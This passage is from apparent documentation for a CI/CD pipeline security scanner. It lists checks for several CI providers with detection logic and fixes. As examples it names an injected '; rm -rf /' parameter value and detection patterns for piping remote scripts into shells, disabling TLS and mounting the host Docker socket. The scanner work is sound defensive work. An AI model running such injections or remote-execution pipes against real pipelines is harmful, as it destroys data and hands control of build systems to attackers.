Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI |
5.2.3: Ensure deployment environment activity is audited
Evidenced by 2 checks across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CD-003 |
No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
S3-004 |
Artifact bucket access logging not enabled | LOW | AWS |
Check details
Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.
ADO-001: Task reference not pinned to specific version HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. Pass when every task: reference carries a two- or three-segment semver.
Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-001 in the Azure DevOps provider.
ADO-002: Script injection via attacker-controllable context HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.
Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
Source: ADO-002 in the Azure DevOps provider.
ADO-003: Variables contain literal secret values CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.
Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
Source: ADO-003 in the Azure DevOps provider.
ADO-004: Deployment job missing environment binding MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.
Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
Source: ADO-004 in the Azure DevOps provider.
ADO-005: Container image not pinned to specific version HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Container images can be declared at resources.containers[].image or job.container (string or {image:}). Floating / untagged refs let the publisher swap the image contents.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag. Avoid :latest and untagged refs.
Source: ADO-005 in the Azure DevOps provider.
ADO-006: Artifacts not signed MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Passes when cosign / sigstore / slsa-* / notation-sign appears anywhere in the pipeline text.
Recommendation. Add a task that runs cosign sign or notation sign, Azure Pipelines' workload identity federation enables keyless signing. Publish the signature to the artifact feed and verify it at deploy time.
Source: ADO-006 in the Azure DevOps provider.
ADO-007: SBOM not produced MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact.
Recommendation. Add an SBOM step, microsoft/sbom-tool, syft . -o cyclonedx-json, or anchore/sbom-action. Publish the SBOM as a pipeline artifact so downstream consumers can ingest it.
Source: ADO-007 in the Azure DevOps provider.
ARGO-001: Argo template container image not pinned to a digest HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Walks spec.templates[].container, spec.templates[].script, and spec.templates[].containerSet.containers[]. The image must contain @sha256: followed by a 64-char hex digest.
Recommendation. Pin every container / script template image to a content-addressable digest (alpine@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the workflow's containers at the next pull, with no audit trail in the WorkflowTemplate.
Source: ARGO-001 in the Argo Workflows provider.
ARGO-002: Argo template container runs privileged or as root HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Detection fires on securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all. Also walks spec.podSpecPatch (raw YAML) for an explicit privileged: true token.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every template container / script. A privileged container shares the node's kernel namespaces; a malicious image then has root on the build node and breaks the boundary between workflow and cluster.
Source: ARGO-002 in the Argo Workflows provider.
ARGO-003: Argo workflow uses the default ServiceAccount MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Applies to Workflow and CronWorkflow. WorkflowTemplate / ClusterWorkflowTemplate are exempt because the SA is set on the run that references them. An explicit serviceAccountName: default is treated the same as omission.
Recommendation. Set spec.serviceAccountName (or spec.workflowSpec.serviceAccountName for CronWorkflow) to a least-privilege ServiceAccount that carries only the secrets and RBAC the workflow needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for workflow pods.
Source: ARGO-003 in the Argo Workflows provider.
ARGO-004: Argo workflow mounts hostPath or shares host namespaces CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Walks spec.volumes[].hostPath and the raw spec.podSpecPatch string for hostNetwork, hostPID, hostIPC, and hostPath.
Recommendation. Use emptyDir or PVC-backed volumes instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true from any inline podSpecPatch. A hostPath mount of /var/run/docker.sock or / lets the workflow break out of the pod and act as the underlying node.
Source: ARGO-004 in the Argo Workflows provider.
ARGO-005: Argo input parameter interpolated unsafely in script / args CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Fires on any {{inputs.parameters.X}}, {{workflow.parameters.X}}, or {{item.X}} token inside a script.source body or a container.args string that isn't already wrapped in quotes. Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate {{inputs.parameters.<name>}} directly into script.source or container.args. Argo substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Pass the parameter via env: (value: '{{inputs.parameters.<name>}}') and reference the env var quoted in the script ("$NAME"); or use inputs.artifacts for file payloads.
Source: ARGO-005 in the Argo Workflows provider.
ARGO-006: Literal secret value in Argo template env or parameter default CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than an interpolation.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or arguments.parameters[].value. Workflow manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-006 in the Argo Workflows provider.
ARGO-007: Argo workflow has no activeDeadlineSeconds LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Applies to Workflow, CronWorkflow, WorkflowTemplate, and ClusterWorkflowTemplate. The field can sit at the workflow level or on individual templates.
Recommendation. Set spec.activeDeadlineSeconds (or spec.workflowSpec.activeDeadlineSeconds on a CronWorkflow) so a hung step can't pin the workflow controller's reconcile cycle indefinitely. Pick a value generous enough for the slowest legitimate run (e.g. 3600 for a typical pipeline, 21600 for ML training). Per-template activeDeadlineSeconds is also accepted as evidence of intent.
Source: ARGO-007 in the Argo Workflows provider.
ARGO-008: Argo script source pipes remote install or disables TLS HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Walks script.source and joined container.args text with the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes.
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the template image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the workflow runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ARGO-008 in the Argo Workflows provider.
ARGO-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Detection mirrors GHA-006 / TKN-009 / BK-009, the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in each Argo document. Fires only on artifact-producing Workflows / WorkflowTemplates (those that invoke docker build / docker push / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Workflows don't trip it.
Recommendation. Add a cosign step to the Workflow. The most common shape is a final sign template that runs cosign sign --yes <repo>@sha256:<digest> after the build. Sign by digest, not tag, so a re-pushed tag can't bypass the signature.
Source: ARGO-009 in the Argo Workflows provider.
ARGO-010: No SBOM generated for build artifacts MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Workflows.
Recommendation. Add an SBOM-generation template. syft <artifact> -o cyclonedx-json > /tmp/sbom.json runs in any standard container; cyclonedx-cli and cdxgen are alternative producers. Persist the SBOM as an output artifact so downstream templates and consumers can read it.
Source: ARGO-010 in the Argo Workflows provider.
ARGO-011: No SLSA provenance attestation produced MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, witness run, attest-build-provenance).
Recommendation. Add a cosign attest --predicate slsa.json --type slsaprovenance <ref> step after the build template, or use witness run to record the build environment. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: ARGO-011 in the Argo Workflows provider.
ARGO-012: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec. Walks every Argo document and passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner template. trivy fs /workdir for source / filesystem; trivy image <ref> for container images. grype, snyk, npm audit, pip-audit are alternatives. Fail the template on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: ARGO-012 in the Argo Workflows provider.
BB-001: pipe: action not pinned to exact version HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.
Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-001 in the Bitbucket provider.
BB-002: Script injection via attacker-controllable context HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name can execute inline.
Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.
Source: BB-002 in the Bitbucket provider.
BB-003: Variables contain literal secret values CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.
Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
Source: BB-003 in the Bitbucket provider.
BB-004: Deploy step missing deployment: environment gate MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.
Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
Source: BB-004 in the Bitbucket provider.
BB-005: Step has no max-time, unbounded build MEDIUM 🔧 fix
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Without max-time, the step runs until Bitbucket's 120-minute global default kills it. Explicit per-step timeouts cap blast radius and cost.
Recommendation. Add max-time: <minutes> to each step, sized to the 95th percentile of historical runtime plus margin. Bounded runs limit the blast radius of a compromised build and prevent runaway minute consumption.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-005 in the Bitbucket provider.
BB-006: Artifacts not signed MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts can't be verified downstream. Passes when cosign / sigstore / slsa-* / notation-sign appears in the pipeline body.
Recommendation. Add a step that runs cosign sign against the built image or archive, using Bitbucket OIDC for keyless signing where possible. Publish the signature next to the artifact and verify it at deploy time.
Source: BB-006 in the Bitbucket provider.
BB-007: SBOM not produced MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / sbom-tool / Trivy-SBOM appears.
Recommendation. Add an SBOM step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM as a build artifact.
Source: BB-007 in the Bitbucket provider.
BK-001: Buildkite plugin not pinned to an exact version HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).
Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
Source: BK-001 in the Buildkite provider.
BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).
Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-002 in the Buildkite provider.
BK-003: Untrusted Buildkite variable interpolated in command HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).
Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
Source: BK-003 in the Buildkite provider.
BK-004: Remote script piped into shell interpreter HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.
Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-004 in the Buildkite provider.
BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).
Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-005 in the Buildkite provider.
BK-006: Step has no timeout_in_minutes LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts, a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.
Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
Known false positives.
- Steps that genuinely need >24h (rare; database migrations, ML training jobs), set
timeout_in_minutes: 1440explicitly so the absence of a timeout is intentional.
Source: BK-006 in the Buildkite provider.
BK-007: Deploy step not gated by a manual block / input MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution, 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.
Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
Known false positives.
- Pipelines where the deploy gate lives in a triggered pipeline rather than the local file, the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op
block:to silence.
Source: BK-007 in the Buildkite provider.
BK-008: TLS verification disabled in step command MEDIUM 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative, partial-word matches (--insecure-protocols) are excluded.
Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-008 in the Buildkite provider.
BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts can't be verified downstream, a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.
Recommendation. Add a signing step, install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.
Source: BK-009 in the Buildkite provider.
BK-010: No SBOM generated for build artifacts MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog, syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.
Source: BK-010 in the Buildkite provider.
BK-011: No SLSA provenance attestation produced MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).
Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: BK-011 in the Buildkite provider.
BK-012: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.
Recommendation. Add a vulnerability scanner, trivy fs . for source / filesystem, trivy image <ref> for container images, grype and snyk for either. Add npm audit / pip-audit for language-specific dep audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: BK-012 in the Buildkite provider.
CB-001: Secrets in plaintext environment variables CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.
Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
Source: CB-001 in the AWS provider.
CB-002: Privileged mode enabled HIGH
Evidences: 2.1.3 Ensure the build environment is hardened, 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.
Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.
Source: CB-002 in the AWS provider.
CB-003: Build logging not enabled MEDIUM
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.
Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.
Source: CB-003 in the AWS provider.
CB-004: No build timeout configured LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. A CodeBuild project at AWS's 480-minute maximum is rarely deliberate. Without a tighter ceiling, a runaway test loop, a fork-PR cryptomining payload, or a build that hangs on stdin keeps the build host (and its IAM role) live for the full eight hours, racking up cost and extending the compromise window.
Recommendation. Set a build timeout appropriate for your expected build duration (typically 15–60 minutes) to limit the blast radius of a runaway or abused build.
Source: CB-004 in the AWS provider.
CB-005: Outdated managed build image MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 2.1.3 Ensure the build environment is hardened.
How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here, CB-009 handles the separate concern of tag vs digest pinning for custom images.
Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.
Known false positives.
- One version behind the current
aws/codebuild/standardis a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.
Source: CB-005 in the AWS provider.
CB-006: CodeBuild source auth uses long-lived token HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.
Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.
Source: CB-006 in the AWS provider.
CB-007: CodeBuild webhook has no filter group MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. A CodeBuild webhook with no filter groups fires on every push and every PR from any actor, including fork PRs from outside the org. Anyone able to open a PR triggers the build with whatever IAM authority the project's role carries. Filter groups (branch + actor + event type) are the gate.
Recommendation. Define filter groups restricting triggers to specific branches, actors, and event types.
Source: CB-007 in the AWS provider.
CC-001: Orb not pinned to exact semver HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.
Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-001 in the CircleCI provider.
CC-002: Script injection via untrusted environment variable HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.
Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
Source: CC-002 in the CircleCI provider.
CC-003: Docker image not pinned by digest HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Docker images referenced in docker: blocks under jobs or executors must include an @sha256:... digest suffix. Tag-only references (:latest, :18) are mutable and can be replaced at any time by whoever controls the upstream registry.
Recommendation. Pin every Docker image to its sha256 digest: cimg/node:18@sha256:abc123.... Tags like :latest or :18 are mutable, a registry compromise or upstream push silently replaces the image content.
Source: CC-003 in the CircleCI provider.
CC-004: Secret-like environment variable not managed via context MEDIUM
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Jobs that declare environment variables with secret-looking names (containing PASSWORD, TOKEN, SECRET, or API_KEY) in inline environment: blocks bypass CircleCI's context restrictions, security groups, OIDC claims, and audit logs are only enforced when secrets live in contexts.
